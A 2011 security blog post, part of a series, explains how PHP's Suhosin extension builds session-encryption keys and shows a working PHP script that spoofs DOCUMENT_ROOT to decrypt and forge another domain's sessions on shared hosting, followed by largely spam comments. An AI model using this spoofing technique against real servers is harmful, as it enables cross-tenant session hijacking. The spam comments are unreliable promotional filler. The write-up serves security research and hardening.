Article series
Part 1: The Basics of Exploitation and How to Secure a Serverhttp://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-1.html
Part 2: Promiscuous Session Files
http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-2.html
Part 3: Bypassing Suhosin's Session Encryption
http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-3.html
Generating the key
When processing a request, Suhosin generates a unique encryption key for each client. To build the encryption key, an algorithm is seeded with 4 pieces of data, or a subset thereof. The user-agent, the document-root, 0-4 octets of the remote IP address and a user defined key. These pieces of data are chosen to produce a unique key for every client on every domain.Domain A and B are hosted on the same shared server and an attacker with access to domain B wants to conduct a local session poisoning attack targeting domain A. When transparent session encryption is enabled the attacker is required to replicate the conditions of the targeted web application at domain A when decrypting/encrypting its session files in the context of domain B.
- The remote IP address of the attacker normally does not change and need not be cared about.
- The user-agent is also controlled by the attacker and normally does not change.
- The user defined key is a string defined in the runtime configuration option suhosin.session.cryptkey. By default it is an empty string. And even if set, it is usually a global setting meaning that domain A and domain B shares the same key. But if domain A actually has got its own unique key configured, the only remaining option is to bruteforce it. A bruteforce will probably fail unless a very short or otherwise inadequate key was chosen.
- The document-root is the web server's root directory where the web site's files resides, and therefore unique to every domain on a shared server. To generate the same key as domain A in the context of domain B, the attacker needs to spoof domain B's document-root to that of domain A.
char *suhosin_generate_key(char *key, zend_bool ua, zend_bool dr, long raddr, char *cryptkey TSRMLS_DC)
{
char *_ua = NULL;
char *_dr = NULL;
char *_ra = NULL;
suhosin_SHA256_CTX ctx;
if (ua) {
_ua = sapi_getenv("HTTP_USER_AGENT", sizeof("HTTP_USER_AGENT")-1 TSRMLS_CC);
}
if (dr) {
_dr = sapi_getenv("DOCUMENT_ROOT", sizeof("DOCUMENT_ROOT")-1 TSRMLS_CC);
}
if (raddr > 0) {
_ra = sapi_getenv("REMOTE_ADDR", sizeof("REMOTE_ADDR")-1 TSRMLS_CC);
}
SDEBUG("(suhosin_generate_key) KEY: %s - UA: %s - DR: %s - RA: %s", key,_ua,_dr,_ra);
suhosin_SHA256Init(&ctx);
if (key == NULL) {
suhosin_SHA256Update(&ctx, (unsigned char*)"D3F4UL7", sizeof("D3F4UL7"));
} else {
suhosin_SHA256Update(&ctx, (unsigned char*)key, strlen(key));
}
if (_ua) {
suhosin_SHA256Update(&ctx, (unsigned char*)_ua, strlen(_ua));
}
if (_dr) {
suhosin_SHA256Update(&ctx, (unsigned char*)_dr, strlen(_dr));
}
if (_ra) {
if (raddr >= 4) {
suhosin_SHA256Update(&ctx, (unsigned char*)_ra, strlen(_ra));
} else {
long dots = 0;
char *tmp = _ra;
while (*tmp) {
if (*tmp == '.') {
dots++;
if (dots == raddr) {
break;
}
}
tmp++;
}
suhosin_SHA256Update(&ctx, (unsigned char*)_ra, tmp-_ra);
}
}
suhosin_SHA256Final((unsigned char *)cryptkey, &ctx);
cryptkey[32] = 0; /* uhmm... not really a string */
return cryptkey;
}
Spoofing DOCUMENT_ROOT
On line 580 in session.c the value used when generating the key is retrieved from an environment variable by the function sapi_getenv. The thing is that environment variables can be modified from within a PHP script and the document-root can therefore be spoofed before the session is initialized.Here is a short script utilizing a function that tries three different methods to set the DOCUMENT_ROOT environment variable.
// Output original value
echo "[i] DOCUMENT_ROOT was set to '".getenv('DOCUMENT_ROOT')."'.\n";
// Function to set the DOCUMENT_ROOT environment variable
setdocroot('/hsphere/local/home/useraaa/domain-a.com');
// Output new value
echo "[i] DOCUMENT_ROOT changed to '".getenv('DOCUMENT_ROOT')."'.\n";
// Initializing a session
session_start();
// Setting some arbitrary values
$_SESSION['x1'] = 'hej';
$_SESSION['x2'] = 'apa';
// Closing the session
session_write_close();
function setdocroot($docroot){
// Function trying different methods to
// set the DOCUMENT_ROOT environment variable.
// http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-3.html
@putenv("DOCUMENT_ROOT=$docroot");
if($docroot === getenv('DOCUMENT_ROOT'))return true;
if(is_callable('apache_setenv')){
apache_setenv('DOCUMENT_ROOT',$docroot);
if($docroot === getenv('DOCUMENT_ROOT'))return true;
}
@exec("SET DOCUMENT_ROOT=$docroot");
if($docroot === getenv('DOCUMENT_ROOT'))return true;
return false;
}
The attacker with access to domain B will have to make an educated guess to what the document-root of domain A is. Clues can be found by studying domain B's own document-root. Usually it contains the user name and domain name, both which would be substituted by those relevant to domain A.
A more precise way of obtaining domain A's document-root is to utilize a Full Path Disclosure vulnerability. As suggested by OWASP, the PHPSESSID cookie could be set to an empty string which, if error reporting is turned on, triggers an error message like this one that reveals the local path.
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /hsphere/local/home/useraaa/domain-a.com/includes/session.php on line 4
hahaha you didn't lets anything about sessions
ReplyDeletethanks man ;)
great articl thanx
ReplyDeleteAwesome article - I've automated the whole attack in C.
ReplyDeletehttp://www.idontplaydarts.com/2011/11/decrypting-suhosin-sessions-and-cookies/
I think you should have also included a
ReplyDeletesession_id(id_you_want_to_poison);
am I right? Or have i missunderstood....
artistic AND integrative medicine are usually current actions of care used right now via medical professionals. to learn how they work, what role they play, ALONG WITH the differences, This has keys to press to help 1st understand how AND why they are obtained in the chain connected with modern medicine. Kyäni
ReplyDeleteGetting programming assignment help is very easy but you have to make sure that you select the right website. There are many websites on the internet that claim to offer programming assignment help but not all of them are good. Some of these websites employ students and these students do an okayish job when they work on your assignment. The good websites, on the other hand, have professionals working for them and these professionals offer the best programming help. You have to do good research, read reviews, and select a good website and then apply for programming assignment help.
ReplyDeleteMua vé máy bay tại đại lý vé Aivivu, tham khảo
ReplyDeletegiá vé máy bay đi Mỹ khứ hồi
giá vé máy bay từ california về việt nam
vé máy bay từ đức về việt nam
các chuyến bay từ nga về việt nam
Thanks for sharing this.,
ReplyDeleteLeanpitch provides online training in Scrum Master, everyone can use it wisely.
Join Leanpitch 2 Days CSM Certification Workshop in different cities.
Scrum master certiification Chennai
CSM certiification Chennai
Thanks for sharing this.,
ReplyDeleteLeanpitch provides online training in Scrum Master, everyone can use it wisely.
Join Leanpitch 2 Days CSM Certification Workshop in different cities
Scrum master certiification Bangalore
CSM certiification Bangalore
Thanks for sharing this.,
ReplyDeleteLeanpitch provides online training in Scrum Master, everyone can use it wisely.
Join Leanpitch 2 Days CSM Certification Workshop in different cities
Scrum master certiification Hyderabad
CSM certiification Hyderabad
This comment has been removed by the author.
ReplyDeleteWe Level Up mental health residential treatment centers texas offers top-tier addiction treatment detox using evidence-based therapy along with secondary dual diagnosis programs.
ReplyDeleteLevel Up best drug rehabs in florida Treatment Center in West Palm Beach is located in stunning South Florida. Our clients who are looking for the best alcohol or drug treatment to overcome their fixation for the last time come from the United States, Canada, and even the world to receive our treatment plan.
ReplyDeleteWorld-class We Level Up alcoholism Addiction Treatment Center providing Dual-Diagnosis Recovery Programs.
ReplyDeleteI am a writer and i like your content. Very technical and Very informative. your blog is very helpful for developer and just like my blogs help writers. Like Online Fictional Ghostwriting Agency help me to gain new ideas bout content and topics.
ReplyDeleteSe till att du tjänar pengar på din skrotbil innan skrottjuvar gör det! Din skrotbil kan vara värd några pund! Skrota bilen
ReplyDeleteThis is impressive that Local Session Poisoning in PHP has been started. These sessions will be very helpful for beginners. Thanks for sharing this with us. I really appreciate that. Now it's time to avail vacuum storage bags for more information.
ReplyDeleteI have seen your article. I read this with carefully. You such providing knowledgeable content. Thank you for this. I will share this site with others. Now it's time to avail Siding Services In Alachua County FL for more information.
ReplyDeleteI've known a passel of big cheeses who spring to conclusions in the matter of Dietary Supplements. Weight Loss is above par. Think about what you would be looking for in Dietary Supplements because Keto Diets can make you feel better about your Weight Loss. It is filled with Dietary Supplements goodness. As usual, this isn't original.
ReplyDeletehttps://www.nutraket.com/healthy-keto-gummies/
https://www.nutraket.com/derma-vaniella/
https://www.nutraket.com/el-toro-cbd-gummies/
https://www.nutraket.com/spectrum-cbd-gummies/
https://www.offerplox.com/wellness/strictiond/
https://www.offerplox.com/wellness/ultra-k9-pro/
https://www.nutraket.com/kayla-lemieux-keto-gummies/
https://lookerstudio.google.com/reporting/a7e3a724-0975-44d7-9216-af0e84c74757
https://www.outlookindia.com/outlook-spotlight/striction-d-blood-sugar-reviews-healthy-habits-strictiond-for-sale-ingredients-offer-at-walmart-news-246821
https://www.eunews24.com/press-release/ree-drummond-keto-weight-loss-fat-burning-purekana-keto-diet-pills-reviews-2022/
It seems like in future PHP is one of the language which is highly used. That's why your article is very helpful and useful for us. It contains many useful information. Thanks for sharing. Now its time to avail Limo service West Palm Beach for more information.
ReplyDeletebest monthly website maintenance packages
ReplyDeleteToyota CHR Price In Bangladesh
ReplyDeleteWhile the article delves into the technicalities of local session poisoning in PHP, the mention of animal communicator, offers an intriguing departure from the usual discourse. Despite the focus on programming and security, considering the role of an animal communicator prompts us to explore the broader spectrum of human-animal relationships and communication.
ReplyDeleteUseful information like this can be surprisingly hard to find on Australian websites. Often, accessing such content requires extra effort, like using a VPN. For instance, you can easily buy Iget Bar no matter where you are. While not widely known, here are 5 flavors of Iget Bar vape in Australia worth exploring.
ReplyDelete